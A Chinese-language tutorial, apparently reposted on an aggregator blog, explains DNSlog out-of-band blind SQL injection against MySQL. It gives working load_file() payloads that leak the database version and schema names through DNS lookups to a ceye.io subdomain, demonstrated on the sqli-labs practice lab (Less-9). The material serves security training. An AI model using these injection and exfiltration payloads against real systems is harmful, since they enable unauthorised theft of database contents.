Dnslog盲注原理

布爾盲注和時間盲注相當于猜單詞的游戲，我們需要對每一位逐步的猜測，效率很低，需要發送很多的請求進行判斷，很可能會觸發安全設備的防護
我們需要一種方式能夠減少請求，直接回顯數據——Dnslog注入
Dns在解析的時候會留下日志，通過讀取多級域名的解析日志，獲取請求信息

Dnslog盲注方法

登錄http://ceye.io/網站并注冊，得到屬于自己的identifier
先嘗試在終端運行curl dnslog.4ke30o.ceye.io

Mysql load_file()函數可以發起請求，LOAD_FILE()函數操作需要用戶具有FILE權限
構造語句，利用load_file()函數發起請求，使用Dnslog接收請求，獲取數據
只能在windows系統下使用load_file()發起請求，在Linux環境下不能使用load_file()發起請求
使用語句select load_file(concat('\\\\',(select version()),'.mysql.4ke30o.ceye.io\\abc'))
在使用前務必記得設置secure_file_priv為""，我使用的是PHPstudy集成環境，所以訪問http://localhost/phpMyAdmin4.8.5/來使用SQL




重啟mysql服務

使用語句，查詢自己想要的數據，此處查詢版本信息


以第九關為例（在windows上運行）
使用http://localhost/sqli-labs-master/index.html進入SQLInjection頁面

http://localhost/sqli-labs-master/Less-9/?id=1%27%20and%20(select%20load_file(concat(%27\\\\%27,(select%20version()),%27.mysql.4ke30o.ceye.io\\abc%27)))--+

• 1

http://localhost/sqli-labs-master/Less-9/?id=1%27%20and%20(select%20load_file(concat(%27\\\\%27,(select%20schema_name%20from%20information_schema.schemata%20limit%201,1),%27.mysql.4ke30o.ceye.io\\abc%27)))--+

• 1

一般來說，查詢不到就說明語法有問題，可以先在mysql中嘗試，在url中務必記得
1、?id=1’ and
2、and后面的語句要用括號括起來
3、不要忘記注釋掉后面的語句–+或者%23

</article>

總結

以上是生活随笔為你收集整理的dnslog盲注原理的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。